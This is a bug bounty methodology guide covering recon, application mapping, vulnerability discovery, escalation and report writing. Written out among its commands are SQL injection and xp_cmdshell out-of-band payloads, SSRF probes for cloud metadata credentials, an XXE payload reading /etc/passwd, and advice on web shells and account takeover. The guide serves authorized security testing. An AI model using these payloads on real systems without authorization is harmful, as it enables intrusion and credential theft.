# Bug Bounty Methodology

A complete, target-agnostic workflow for finding, proving, and reporting vulnerabilities.

---

## Table of Contents

1. [Before You Start a Session](#1-before-you-start-a-session)
2. [Phase 1 — Recon](#2-phase-1--recon)
3. [Phase 2 — Mapping](#3-phase-2--mapping)
4. [Phase 3 — Vulnerability Discovery](#4-phase-3--vulnerability-discovery)
5. [Phase 4 — Exploitation and Escalation](#5-phase-4--exploitation-and-escalation)
6. [Phase 5 — Validate and Report](#6-phase-5--validate-and-report)
7. [Timing Rules](#7-timing-rules)
8. [Session End Protocol](#8-session-end-protocol)
9. [Program Selection Criteria](#9-program-selection-criteria)
10. [Tool Stack by Phase](#10-tool-stack-by-phase)

---

## 1. Before You Start a Session

Complete all three steps before touching any tool.

**Define:** "Today I target [feature / subdomain / vuln class] to achieve [C / I / A / ATO / RCE]"  
**Select:** Pick exactly one or two vuln classes. Write them down.  
**Execute:** Work only those vuln classes this session.

Hunting without a defined goal produces zero findings. The goal focuses your observation — you notice different things when looking for IDOR than when looking for XSS.

### Wide vs Deep Decision

Start wide when the program is new or the scope recently expanded.  
Go deep when you have already mapped the surface and have a specific hypothesis.

| Signal | Do Wide | Do Deep |
|---|---|---|
| First day on program | X | |
| Wildcard scope `*.target.com` | X | |
| Scope update (new subdomain added) | X | |
| You have a specific endpoint that "feels wrong" | | X |
| You've been on the program for 3+ days | | X |
| You found one bug and want siblings | | X |

---

## 2. Phase 1 — Recon

**Goal:** Maximize attack surface before a single payload is sent.

### Subdomain Enumeration

Passive first (no detection risk), then active DNS resolution, then HTTP probing.

```bash
# Passive — queries CT logs, APIs, crawlers
subfinder -d target.com -silent -o subs_passive.txt

# Certificate Transparency — often finds internal subdomains
curl -s "https://crt.sh/?q=%.target.com&output=json" \
  | jq -r '.[].name_value' | sort -u > subs_crt.txt

# Combine and deduplicate
cat subs_passive.txt subs_crt.txt | sort -u > subs_all.txt

# Resolve DNS — eliminate non-existent hosts
puredns resolve subs_all.txt -r resolvers.txt -w subs_resolved.txt

# HTTP probe — get status codes, titles, tech stack
httpx -l subs_resolved.txt -sc -title -tech-detect -o live_hosts.txt
```

### URL and Endpoint Discovery

```bash
# Archive sources — finds old endpoints that still exist
gau target.com | uro > urls_archive.txt
waymore -i target.com -mode U -oU urls_waymore.txt

# Active crawl — follows JS, renders SPAs
katana -u https://target.com -jc -o urls_crawl.txt

# Combine
cat urls_archive.txt urls_waymore.txt urls_crawl.txt | uro | sort -u > urls_all.txt
```

### JS Analysis

```bash
# Download all JS files from the live app
# (intercept in Burp or use katana's JS file output)

# Extract endpoints and secrets
jsluice urls bundle.js | sort -u
trufflehog filesystem ./js_files/ --only-verified

# Search for config keys manually. Minified bundles are one long line,
# so print the match plus context instead of whole lines
grep -oE ".{0,20}(client_id|api_key|secret|token|password|endpoint|host).{0,40}" bundle.js
```

### CSP Header Harvesting

CSP `connect-src` lists the backends the SPA is allowed to talk to, often including internal hostnames that DNS enumeration never surfaces.

```bash
# httpx puts the full URL in column one, so no scheme prefix is needed
for url in $(awk '{print $1}' live_hosts.txt); do
    echo "=== $url ===" && curl -sI "$url" | grep -i content-security-policy
done
```

### Config File Enumeration

Modern SPAs often load runtime config from a separate file that must be publicly readable for the app to boot. Check these paths against every live subdomain (a probe sketch follows the list):

```
/assets/app-constants.js
/configs/app-constants.js
/config/app-constants.js
/env.js
/config.json
/app-constants.js
/static/config.js
/public/config.json
/assets/config.json
```
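
A minimal probe loop, assuming `live_hosts.txt` is httpx output with the URL in column one (trim or extend the path list to match the frameworks you saw during recon):

```bash
# Hedged sketch: request each candidate config path on every live host
# and print only the hits.
while read -r url; do
  for path in /env.js /config.json /app-constants.js /assets/config.json; do
    code=$(curl -s -o /dev/null -w '%{http_code}' "$url$path")
    [ "$code" = "200" ] && echo "FOUND: $url$path"
  done
done < <(awk '{print $1}' live_hosts.txt)
```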

---

## 3. Phase 2 — Mapping

**Goal:** Understand the application like its developer does.

### Authentication Model

Identify what auth mechanism is in use before testing anything:

| Signal | Auth type | What to test |
|---|---|---|
| `Authorization: Bearer eyJ...` (JWT) | JWT / OAuth | Algorithm confusion, `alg:none`, weak secret |
| `Cookie: session=...` (opaque) | Session cookie | Fixation, missing Secure/HttpOnly, CSRF |
| `Cookie: ...` (JWT in cookie) | JWT via cookie | Same as JWT + SameSite misconfiguration |
| `client_id` + `tenant_id` in config | Azure AD / Okta OIDC | Device code, ROPC, scope escalation |
| SAML POST to `/saml/acs` | SAML | Signature wrapping, XML injection |
| API key in header | Static API key | Key in JS source, rotation issues |
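
When the signal is a Bearer JWT, decoding the header tells you which of these attacks apply before reaching for `jwt_tool`. A minimal sketch, assuming `$JWT` holds the raw token:

```bash
# Base64url -> base64: swap the alphabet, restore padding, decode the header.
hdr=$(printf '%s' "$JWT" | cut -d. -f1 | tr '_-' '/+')
case $(( ${#hdr} % 4 )) in 2) hdr="${hdr}==" ;; 3) hdr="${hdr}=" ;; esac
printf '%s' "$hdr" | base64 -d | jq .   # check "alg" and "kid"
```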

### Business Logic Mapping

Find the flows that matter most to the business — these are the flows where bugs have the highest impact.

High-value flows:
- Account creation and email verification
- Password reset
- Payment and checkout
- Data export or bulk download
- Role assignment or privilege escalation
- OAuth authorization
- File upload

For each flow, map it completely in Burp before testing. A flow you don't understand fully cannot be tested for logic flaws.

### Role and Permission Inventory

Create an account at each role level the application supports. Test every request at every role level. Don't assume access control is consistent.
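
A minimal consistency check, assuming you exported one token per role (`TOKEN_ADMIN`, `TOKEN_EDITOR`, `TOKEN_VIEWER`; the endpoint is a placeholder):

```bash
# Replay the same request with each role's token; compare status and size.
# A 200 where a 403 belongs is your lead. Requires bash 4+ for ${role^^}.
for role in admin editor viewer; do
  token_var="TOKEN_${role^^}"
  printf '%-8s' "$role"
  curl -s -o /dev/null -w '%{http_code} %{size_download}\n' \
    -H "Authorization: Bearer ${!token_var}" \
    "https://target.com/api/v1/reports/42"
done
```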

### Anomaly Detection

While mapping, flag anything that looks different from the rest of the application:

- An endpoint that names fields differently (`userId` everywhere, but `user_id` here)
- A response that takes significantly longer than similar requests
- An error message that exposes a different tech stack than the rest of the app
- A parameter that is present in the request but not used in the response
- An endpoint that returns HTTP 200 for requests that should fail

Anomalies point to different developers, different code paths, or different security assumptions — all of which increase the probability of finding a bug.

---

## 4. Phase 3 — Vulnerability Discovery

**Goal:** Find the bug. Work from your session goal. Use the decision tree below.

### Input Classification Decision Tree

```
What type of input are you testing?
│
├── ID / reference (user_id, order_id, uuid)
│   └── IDOR: horizontal and vertical access control
│
├── Search / filter / sort parameter
│   └── SQLi, NoSQLi, GraphQL injection
│
├── URL / webhook / callback / PDF generator input
│   └── SSRF
│
├── Text reflected in the HTML response
│   └── XSS: reflected, stored, DOM
│
├── File upload
│   └── SVG XSS, web shell, path traversal, polyglot files
│
├── Price / quantity / coupon / discount
│   └── Business logic, race conditions, integer overflow
│
├── Login / 2FA / password reset flow
│   └── Auth bypass, rate limit bypass, token prediction
│
├── Object creation with many fields
│   └── Mass assignment
│
├── Template / wiki / markdown editor
│   └── SSTI, SSRF via template rendering
│
└── Nothing obvious
    └── Fuzz with ffuf + smart wordlist, then error-based probing
```
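
For the fuzzing fallback at the bottom of the tree, a starting point (wordlist choice is yours; `-ac` is ffuf's auto-calibration, which filters wildcard responses):

```bash
ffuf -u https://target.com/FUZZ -w wordlist.txt -ac \
     -mc 200,201,204,301,302,307,401,403,405
```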

### Error-Based vs Blind Detection

Always try error-based first — it is faster and produces better evidence.

**Step 1 — Error-based probes:**
```
'   "   {{7*7}}   ${7*7}}   <script>   ../../../
```
Watch for: HTTP 500, stack traces, changed response body, different error message than usual.

**Step 2 — Time-based (if no error):**
```sql
'; WAITFOR DELAY '0:0:5'--    (MSSQL)
'; SELECT SLEEP(5)--          (MySQL)
```
Watch for: response time > 5 seconds.

**Step 3 — OOB (if no time diff):**
```bash
# Start interactsh listener
interactsh-client

# Use the generated hostname in your payload
'; exec master..xp_cmdshell 'nslookup <interactsh_host>'--
```
Watch for: DNS callback in interactsh output.

**Step 4 — Boolean (if no OOB):**
Send two requests — one that should return true and one that should return false. Compare response body or Content-Length. A consistent difference confirms a boolean injection point.
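
A minimal sketch of the comparison, assuming a hypothetical injectable `id` parameter (`curl -G --data-urlencode` handles the URL encoding):

```bash
# Two payloads that differ only in truth value; compare body sizes.
t=$(curl -sG --data-urlencode "id=1' AND '1'='1" https://target.com/item | wc -c)
f=$(curl -sG --data-urlencode "id=1' AND '1'='2" https://target.com/item | wc -c)
echo "true=$t bytes, false=$f bytes"   # a stable difference = boolean injection
```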

---

## 5. Phase 4 — Exploitation and Escalation

**Goal:** Prove maximum business impact. Turn findings into payouts.

### Escalation Decision Tree

**XSS found:**
- Can you steal a session cookie? → Session hijack → ATO
- Cookie is HttpOnly? → Use the XSS to send an authenticated XHR that changes the account email to the attacker's → ATO
- Self-XSS only? → Find a CSRF or postMessage vector to trigger it on another user

**IDOR found:**
- Read access to PII? → Automate to show scale (how many users affected)
- Write access to email or password field? → Direct ATO
- UUID-only IDs? → Find a UUID leak in another endpoint (logs, search results, email headers), then retry

**SSRF found:**
- DNS callback only? → Do NOT report yet. Try to reach `169.254.169.254` (AWS metadata), `100.100.100.200` (Alibaba), `metadata.google.internal`
- Metadata reachable? → Extract IAM credentials → Lateral movement or RCE
- Internal port scan? → Find Redis (6379), Kubernetes API (6443), Elasticsearch (9200) → RCE or data exfil
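
If the SSRF returns response bodies, the metadata probe looks like this. The `url=` parameter and `/api/fetch` endpoint are hypothetical stand-ins for whatever input you found; the metadata paths are the documented cloud endpoints:

```bash
# AWS IMDSv1: a role name in the response means credentials are one request away.
# (IMDSv2 requires a PUT-issued token first, so hardened hosts may refuse.)
curl -sG --data-urlencode \
  "url=http://169.254.169.254/latest/meta-data/iam/security-credentials/" \
  "https://target.com/api/fetch"

# GCP requires a "Metadata-Flavor: Google" header, which most SSRFs cannot set:
# http://metadata.google.internal/computeMetadata/v1/
```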

**Open redirect found:**
- Is it used as an OAuth callback? → Try to redirect the authorization code to your server
- Does `javascript:` scheme work? → XSS
- Neither? → Low severity, note for chaining

**SQLi found:**
- Error-based? → Extract data: passwords, tokens, PII
- `INTO OUTFILE` available? → Write web shell → RCE
- Blind? → Boolean extraction, then time-based extraction for sensitive data

### Minimizing Prerequisites

After proving impact, reduce the attack prerequisites. Every prerequisite you remove increases severity.

- Does the attack require an authenticated account? → Test unauthenticated
- Does it require a victim to click a link? → Test if it works without interaction
- Does it require specific timing? → Test if it works at any time
- Does it require a specific role? → Test if the lowest role can trigger it

### Chaining Low-Severity Findings

Low-severity findings are only low-severity in isolation. When combined, they can reach Critical.

| Finding A | + Finding B | = Escalated Impact |
|---|---|---|
| Open redirect | + OAuth code in redirect | = ATO |
| Self-XSS | + CSRF to trigger XSS | = Stored XSS on victim |
| SSRF (DNS only) | + Internal service with no auth | = Data exfiltration |
| Username enumeration | + No rate limit on login | = Credential stuffing |
| Exposed client_id | + Device code flow enabled | = Phishing-enabled ATO |
| IDOR (read only) | + Leaked UUID from logs | = Data exfiltration at scale |

---

## 6. Phase 5 — Validate and Report

### The 7-Question Gate

Answer all 7 before writing a report. If any answer is no, fix the finding or drop it.

1. **Can I reproduce it?** Run the PoC twice from a clean session.
2. **Is it in scope?** Check the program's scope page explicitly.
3. **Is it a known/intended behavior?** Check the docs; test if it's actually a design choice.
4. **Is the impact real, not theoretical?** Describe what the attacker actually obtains or does.
5. **Am I the first?** Check the program's disclosed reports; search for known CVEs on the component.
6. **Can I minimize prerequisites?** Fewest clicks, fewest accounts, fewest setup steps.
7. **Do I have clean HTTP evidence?** Raw requests and responses ready to paste.

### Report Structure

**Title:**
```
[Bug class] in [endpoint/feature] allows [attacker role] to [impact]
```

Good title: `IDOR in /api/v1/invoices/{id} allows unauthenticated user to download any customer invoice`  
Bad title: `Missing access control on invoice endpoint`

**Summary (2–3 sentences):**
- Sentence 1: What the attacker can do
- Sentence 2: How (the mechanism)
- Sentence 3: Business impact (data type, scale, or system affected)

**Steps to Reproduce:**
Numbered. Every step is a single action. Include exact HTTP requests and responses. Do not include theory or explanation — only what you did.

**Impact section:**
Separate from the summary. Quantify. "Affects all registered users" beats "affects users." Name the data type (PII, financial, credentials) and what an attacker would do with it.

**Proof of Concept:**
Working commands or code. Actual server responses. If a screenshot, also include the raw request/response text.

**Remediation:**
One to two sentences. Name the fix category, not the implementation. "Enforce server-side ownership check before returning invoice data" — not a code snippet.

**CVSS 3.1:**
Include a vector string. Estimate if unsure and note it. Triagers will adjust, but an estimate shows you understand severity.
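
For example, the invoice IDOR from the good title above (network attack, no privileges, no interaction, full read of sensitive data) maps to:

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N   → 7.5 (High)
```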

---

## 7. Timing Rules

These rules prevent the three biggest time-wasters in bug bounty: rabbit holes, random wandering, and program-hopping.

### The 20-Minute Rotation Rule

Every 20 minutes, ask: "Am I making progress?"  
- If yes (new data, partial confirmation, new lead): continue  
- If no (same error, no new information): rotate to the next endpoint, subdomain, or vuln class

Progress means new information. Getting the same 403 five different ways is not progress.

### The 45-Minute Hard Stop

If you have been on a single parameter for 45 minutes with no progress, stop. Add it to your notes as a blocked lead. Move on. Return to it in a future session with fresh eyes or after you have more context from other parts of the app.

### The 2-Week / 30-Hour Program Rule

Stay on a program for a minimum of two weeks or 30 hours before switching. The first hours are always less productive — you are learning the app. The insights come once you understand how it was built.

### After Finding a Bug: The 20-Minute A→B Sprint

Immediately after confirming a bug, spend 20 minutes looking for siblings using the A→B signal:
- Same endpoint pattern (replace resource name, try all HTTP methods)
- Same auth check (or lack of) across related endpoints
- Same config pattern across other subdomains or apps

If nothing found in 20 minutes, continue with your planned session.

---

## 8. Session End Protocol

Run this every time you stop hunting, even for short sessions.

- [ ] Update your findings table: ID, description, severity, status
- [ ] Move tested leads to the dead ends list with the reason they failed
- [ ] Record any new subdomains or attack surface discovered
- [ ] Write one sentence for anything "weird but not exploitable" — these become gadgets later
- [ ] Save Burp/Caido project file

The dead ends list is as valuable as the findings list. It prevents re-testing the same things in future sessions.

---

## 9. Program Selection Criteria

Not all programs are worth hunting. Use these filters before committing.

### Green Flags

- Wildcard scope (`*.target.com`) — more surface to find unique bugs
- Payout history in disclosed reports — indicates the program pays, not just "reputation points"
- Fast triage (< 7 days average) — HackerOne and Bugcrowd publish response-time stats on each program page
- Technical product — more attack surface than a marketing site
- New program or recent scope update — other hunters haven't exhausted it yet
- Disclosed reports show variety — program accepts different bug types

### Red Flags

- Scope limited to one subdomain with no wildcard
- "No monetary reward" or reward caps at < $500 for Critical
- VDP (Vulnerability Disclosure Program) with no bounty — fine for building reputation, bad for income
- Very old program with thousands of researchers — high duplication rate
- Program notes say "issues must have a critical business impact" — the acceptance bar is high and most reports get dismissed
- Public reports show N/A rate > 20% — triagers are trigger-happy

### How to Read Disclosed Reports Before Hunting

Before hunting a new program, read 10–20 disclosed reports. You are looking for:
1. **What bug types are accepted?** (Some programs won't accept rate limit issues or open redirects)
2. **What is the triage quality?** (Do they understand the bugs? Are severities reasonable?)
3. **What has already been found?** (Don't test what's already been found and fixed)
4. **What tech stack does the app use?** (From the report details, not just the program page)
5. **What did researchers test that did NOT work?** (Look for comment threads showing dead ends)

---

## 10. Tool Stack by Phase

### Phase 1 — Recon

| Task | Tool | Notes |
|---|---|---|
| Subdomain enumeration | `subfinder` | Passive; queries many sources |
| Certificate Transparency | `crt.sh` API | Finds internal subdomains |
| DNS resolution | `puredns` | Fast; use a public resolver list |
| HTTP probing | `httpx` | Status codes, titles, tech stack |
| URL discovery (archive) | `gau` + `waymore` | Old endpoints that still exist |
| URL discovery (active) | `katana` | Follows JS rendering |
| URL deduplication | `uro` | Removes parameter variants |
| Port scanning | `naabu` → `rustscan` | Wide sweep first, then deep |
| Nuclei scanning | `nuclei -tags cve,takeover` | Known CVEs first |

### Phase 2 — Mapping

| Task | Tool | Notes |
|---|---|---|
| Proxy + sitemap | Burp Suite / Caido | All manual traffic through here |
| JS analysis | `jsluice` | URL and secret extraction |
| Secret verification | `trufflehog --only-verified` | Only confirmed working keys |
| Parameter discovery | `arjun` + `paramspider` | arjun brute-forces hidden params; paramspider mines archives |
| WAF detection | `wafw00f` | Identifies WAF vendor |
| Tech fingerprint | `httpx -tech-detect` | Framework and server detection |

### Phase 3 — Discovery

| Task | Tool | Notes |
|---|---|---|
| Directory fuzzing | `ffuf -ac` | Auto-calibrate removes false positives |
| XSS filtering | `kxss` → `dalfox` | Find reflections first, then scan |
| SQLi | `ghauri` | Modern; handles blind and WAF bypass |
| SSRF OOB | `interactsh-client` | Can be self-hosted to avoid third-party DNS dependency |
| Subdomain takeover | `subzy` | Checks against 70+ vulnerable services |
| 403 bypass | `byp4xx` | 20+ bypass techniques automated |
| Cloud storage | `s3scanner` | Checks bucket permissions |

### Phase 4 — Exploitation

| Task | Tool | Notes |
|---|---|---|
| HTTP requests | `curl` / Burp Repeater | Exact control over headers and body |
| JWT attacks | `jwt_tool` | Algorithm confusion, `alg:none`, secret brute force |
| OAuth analysis | Manual + Burp | No good automated tool; must be manual |
| Race conditions | Turbo Intruder | Last-byte sync technique |
| SSRF to metadata | Manual | Target-specific; no tool replaces judgment |

---

## Attack Surface Cheat Sheet by Tech Stack

### Angular App
- Check `/assets/app-constants.js`, `/configs/app-constants.js`, `/config/app-constants.js`
- Extract `client_id`, `tenant_id`, API hostnames, WebSocket URLs
- If Azure AD: test device code grant, ROPC
- If Okta: test PKCE bypass, token exchange
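
For the Azure AD case, a hedged probe using the `client_id` and `tenant_id` leaked from the config file. The endpoint is Microsoft's documented device-code endpoint; a `device_code` in the response means the grant is enabled for that client:

```bash
curl -s -X POST \
  "https://login.microsoftonline.com/$TENANT_ID/oauth2/v2.0/devicecode" \
  -d "client_id=$CLIENT_ID" \
  -d "scope=openid profile offline_access" | jq .
```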

### React App (Create React App)
- Env vars compiled into bundle (`REACT_APP_*`)
- Check `window.__ENV` or `window.appConfig` in HTML source
- Source map exposure: try `bundle.js.map`

### Next.js App
- `/_next/static/chunks/` — look for config objects, API routes
- `/api/*` — Next.js API routes often have weaker auth than the main SPA
- Server Actions: CSRF via `Origin: null` bypass
- Image optimization: SSRF via `/_next/image?url=<attacker_controlled>`
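
A quick probe for the image-optimizer SSRF, pointing at your interactsh hostname. The `w` and `q` values must match the app's configured sizes; 64 and 75 are Next.js defaults:

```bash
# A DNS/HTTP hit on interactsh means the optimizer fetched an arbitrary host.
curl -s -o /dev/null -w '%{http_code}\n' \
  "https://target.com/_next/image?url=https://<interactsh_host>/x.png&w=64&q=75"
```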

### Ruby on Rails App
- `/rails/info/routes` in development mode
- Mass assignment: add `admin=true` to any POST body
- Insecure deserialization via `Marshal.load`

### Django App
- `/admin/` — check if Django admin panel is exposed
- `DEBUG=True`: detailed error page with local variables, settings
- `/api/` — Django REST Framework browsable API is often left enabled in staging
- IDOR on integer PKs (Django uses integer primary keys by default)

### GraphQL Endpoint
- `POST /graphql` with `{"query":"{__schema{types{name}}}"}` — introspection check
- Batching attacks: send 100 mutations in one request
- IDOR: replace ID in query with another user's ID
- Field suggestions: send a typo, error response suggests real field names
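
The introspection check from the first bullet as a one-liner (the `/graphql` path is the common default):

```bash
curl -s -X POST https://target.com/graphql \
  -H 'Content-Type: application/json' \
  -d '{"query":"{__schema{types{name}}}"}' | jq '.data.__schema.types | length'
# 0 = introspection off; a large number = the full schema is yours
```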

### SOAP / Legacy XML API
- XXE: inject `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>`
- SSRF via XXE: use `SYSTEM "http://internal-host:port/"`
- Schema disclosure: `?wsdl` often returns the full WSDL definition unauthenticated
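
The XXE probe from the first bullet wrapped in a full request, assuming a hypothetical endpoint and a body element the service echoes back:

```bash
curl -s -X POST https://target.com/soap/service \
  -H 'Content-Type: text/xml' --data-binary @- <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><foo>&xxe;</foo></soap:Body>
</soap:Envelope>
EOF
```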
